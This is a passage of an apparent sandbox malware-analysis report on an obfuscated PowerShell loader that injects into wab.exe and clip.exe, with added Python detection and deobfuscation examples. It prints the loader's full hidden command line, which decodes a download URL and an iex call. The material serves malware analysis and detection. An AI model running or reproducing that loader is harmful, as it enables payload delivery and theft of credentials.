          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: ieframe.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: netapi32.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: wkscli.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: mlang.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: winsqlite3.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: vaultcli.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: dpapi.dll
          Source: C:\Windows\SysWOW64\clip.exe Section loaded: cryptbase.dll
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe Section loaded: wininet.dll
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe Section loaded: mswsock.dll
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe Section loaded: dnsapi.dll
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe Section loaded: iphlpapi.dll
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe Section loaded: fwpuclnt.dll
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe Section loaded: rasadhlp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: actxprxy.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\clip.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
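          The process-creation rows in this section give the parent/child pairs a detection engineer would key on: cmd.exe launching a hidden, very long PowerShell command; 32-bit powershell.exe launching wab.exe (the Windows Mail binary used here as the injection host, which is what the Sigma rule "Wab/Wabmig Unusual Parent Or Child Processes" in the summary fires on); a randomly named dropped executable launching clip.exe; and clip.exe, which normally has no children, launching firefox.exe, with the same clip.exe later opening the Outlook profile key. The checks below are an added example, not part of the report and not the Sigma rule itself; the event records are constructed from the rows above, and the parent allow-lists and the 1000-character command-line threshold are assumptions chosen for illustration.

```python
"""Parent/child process anomaly checks modelled on the process-creation rows in
this report.  Added example, not code from the report or the cited Sigma rule.
Event records are constructed from the report's rows; allow-lists and the
command-line length threshold are assumptions for illustration."""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str = ""


# Assumed baselines (not from the report): hosts that should not be spawning
# Windows Mail binaries, binaries that never need children, and the parents a
# console tool like clip.exe is normally started from.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
MAIL_HOSTS = {"wab.exe", "wabmig.exe"}
NO_CHILDREN = {"clip.exe", "wab.exe", "wabmig.exe"}
CLIP_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "conhost.exe"}
LONG_CMDLINE = 1000  # assumed threshold for "very long command line"
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def check(evt: ProcEvent) -> List[str]:
    """Return the names of every rule the event trips (empty list if none)."""
    parent, child = _name(evt.parent_image), _name(evt.image)
    findings = []
    if child in MAIL_HOSTS and parent in SCRIPT_HOSTS:
        findings.append("wab_unusual_parent")
    if child == "clip.exe" and parent not in CLIP_PARENTS:
        findings.append("clip_unusual_parent")
    if parent in NO_CHILDREN:
        findings.append(f"unexpected_child_of_{parent}")
    if (child in {"powershell.exe", "pwsh.exe"}
            and HIDDEN_RE.search(evt.command_line)
            and len(evt.command_line) > LONG_CMDLINE):
        findings.append("hidden_long_powershell")
    return findings


def scan(events: List[ProcEvent]) -> List[Tuple[str, List[str]]]:
    """Keep only the events that trip at least one rule."""
    return [(evt.image, hits) for evt in events if (hits := check(evt))]


# Constructed events mirroring the report's rows; the PowerShell command line is
# shortened to the visible prefix plus repeated filler to reach the real length class.
WAB = r"C:\Program Files (x86)\Windows Mail\wab.exe"
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CLIP = r"C:\Windows\SysWOW64\clip.exe"
DROPPED = r"C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe"
LONG_PS = 'powershell.exe -windowstyle hidden "cls;write \'' + " ".join(["Decisionen"] * 120) + "'\""

EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS64, LONG_PS),
    ProcEvent(PS32, WAB, f'"{WAB}"'),
    ProcEvent(DROPPED, CLIP, f'"{CLIP}"'),
    ProcEvent(CLIP, r"C:\Program Files\Mozilla Firefox\firefox.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", WAB, f'"{WAB}"'),  # benign baseline: user opened Contacts
]

if __name__ == "__main__":
    for image, hits in scan(EVENTS):
        print(f"{image}: {', '.join(hits)}")
```

          The benign baseline row (explorer.exe launching wab.exe) is there to show the rule keys on the parent, not on wab.exe itself; in a real pipeline these checks would run over Sysmon event 1 or the equivalent EDR process-start telemetry, and the firefox.exe child would be correlated with the vaultcli.dll and winsqlite3.dll loads by clip.exe listed above to confirm browser credential harvesting.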
          Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2595452528.00000000026D1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nPzDKsDmTWqJ.exe, 0000000D.00000002.3286344081.000000000099E000.00000002.00000001.01000000.00000009.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000000.2862732022.000000000099E000.00000002.00000001.01000000.00000009.sdmp
          Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000A.00000003.2698808287.000000002118F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2695801155.0000000020FD2000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2793819651.00000000041DB000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2791227539.0000000004027000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000A.00000003.2698808287.000000002118F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2695801155.0000000020FD2000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2793819651.00000000041DB000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2791227539.0000000004027000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: clip.pdb source: wab.exe, 0000000A.00000002.2803637542.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2790925038.0000000005894000.00000004.00000020.00020000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287519662.0000000001228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdbOS_1 source: powershell.exe, 00000006.00000002.2603068995.0000000006DB0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wab.pdbGCTL source: clip.exe, 0000000E.00000002.3034173382.0000000002795000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3035044286.00000000049BC000.00000004.10000000.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3288413199.000000000335C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.3286106030.0000000002C0C000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: clip.pdbGCTL source: wab.exe, 0000000A.00000002.2803637542.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2790925038.0000000005894000.00000004.00000020.00020000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287519662.0000000001228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wab.pdb source: clip.exe, 0000000E.00000002.3034173382.0000000002795000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3035044286.00000000049BC000.00000004.10000000.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3288413199.000000000335C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.3286106030.0000000002C0C000.00000004.80000000.00040000.00000000.sdmp

          Data Obfuscation

          Source: Yara match File source: 00000006.00000002.2609998888.000000000A058000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000002.2791578179.00000000041A8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.2609327790.00000000080B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.2599496258.0000000005493000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.2767467645.000001B110072000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Udbredes)$global:Ernestines = [System.Text.Encoding]::ASCII.GetString($Hnseavler)$global:zoblens=$Ernestines.substring($Hyacint,$Shutterwise)<#Nondevelopmentally Universalisten Halfm
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Cryptonym250 $Testimoniernes $Kakkak), (lugger @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Glorrig = [AppDomain]::CurrentDomain.GetAssemblies()$global:
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Foster)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Gumboil, $false).DefineType($Polychroism162, $Efte
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Udbredes)$global:Ernestines = [System.Text.Encoding]::ASCII.GetString($Hnseavler)$global:zoblens=$Ernestines.substring($Hyacint,$Shutterwise)<#Nondevelopmentally Universalisten Halfm
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. 
g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePan
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. 
g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too
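          The command line above carries the loader's only real obfuscation layer. `Antikvitetsforretnings` keeps every fifth character of its argument (offsets 4, 9, 14, ...) and treats the four characters before each one as filler; the method name is assembled at run time from `'SUBsTR'` + `'ing'`, and the `${host}.CurrentCulture` test is what turns the substring width from `$null` into 1, so a stripped-down script emulator without a culture object decodes every string to nothing. The Python below is an added example written for this page, not code from the sample or from Joe Sandbox. It re-implements that loop, pulls every argument of the decoder out of a command line, and runs it over three short arguments copied from the report, which come out as `User-Agent`, `>` and `iex`. The long arguments (`$Antoninas`, `$nucleli`, `$Martinetishness`) are deliberately not fed in: the report's HTML rendering collapses runs of spaces, which shifts the five-character frame and garbles the decode.

```python
"""Decoder for the character-stride obfuscation in this sample's PowerShell stage.

Added example for this page; not code from the sample or from Joe Sandbox.
The command line in the report defines (variable names as in the report):

    If (${host}.CurrentCulture) {$Cabalismsbryderens++;}        # width: $null -> 1
    Function Antikvitetsforretnings($Rodfunktionerne){
        $Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;
        $Sinecural='SUBsTR';$Sinecural+='ing';                   # "Substring", built at run time
        For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){
            $Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}
        $Decisionen;}

Every fifth character from offset 4 is payload; the four before it are filler.
"""
import re


def decode_stride(blob: str, start: int = 4, step: int = 5, width: int = 1) -> str:
    """Replicate the loop above.

    Takes `width` characters at start, start+step, ... while the index is
    strictly below len(blob) - width (the PowerShell loop's -lt bound).
    width=0 models a host without CurrentCulture: the loop still runs but
    every Substring(i, 0) is empty, so the stage silently decodes to nothing.
    """
    limit = len(blob) - width
    return "".join(blob[i:i + width] for i in range(start, limit, step))


def decode_all(cmdline: str, func_name: str = "Antikvitetsforretnings") -> list:
    """Decode the single-quoted argument of every call to the decoder function.

    Assumes the sample's call shape  <func_name> '<text>'  with no embedded
    single quotes inside the argument, which holds for this command line.
    """
    pattern = re.compile(re.escape(func_name) + r"\s+'([^']*)'")
    return [decode_stride(arg) for arg in pattern.findall(cmdline)]


# Three short arguments copied verbatim from the command line in the report.
SAMPLE_ARGS = {
    "Torumslejligheds": "BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ",
    "Udarte": "Hytt>Sony ",
    "Eksperter": "GuttiVirke,trexScor ",
}

# Constructed fragment in the shape of the sample's command line (built from the
# three arguments above; it is not the full original line).
SAMPLE_CMDLINE = ";".join(
    f"${var}=Antikvitetsforretnings '{arg}'" for var, arg in SAMPLE_ARGS.items()
)


if __name__ == "__main__":
    for var, decoded in zip(SAMPLE_ARGS, decode_all(SAMPLE_CMDLINE)):
        print(f"${var} -> {decoded!r}")
    # A host that hides CurrentCulture gets an empty decode for every string.
    print(repr(decode_stride(SAMPLE_ARGS["Torumslejligheds"], width=0)))
```

          To apply this to the real command line, take the argument text from the raw process command line (Sysmon event 1, the sandbox's process tree export, or the .bat itself) rather than from the rendered report, so that the whitespace inside each argument survives intact.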
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F300BD pushad ; iretd 2_2_00007FF848F300C1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF849005479 push ebp; iretd 2_2_00007FF849005538
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF8490083A8 push eax; iretd 2_2_00007FF8490083A9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0415EC78 pushfd ; retf 6_2_0415EC79
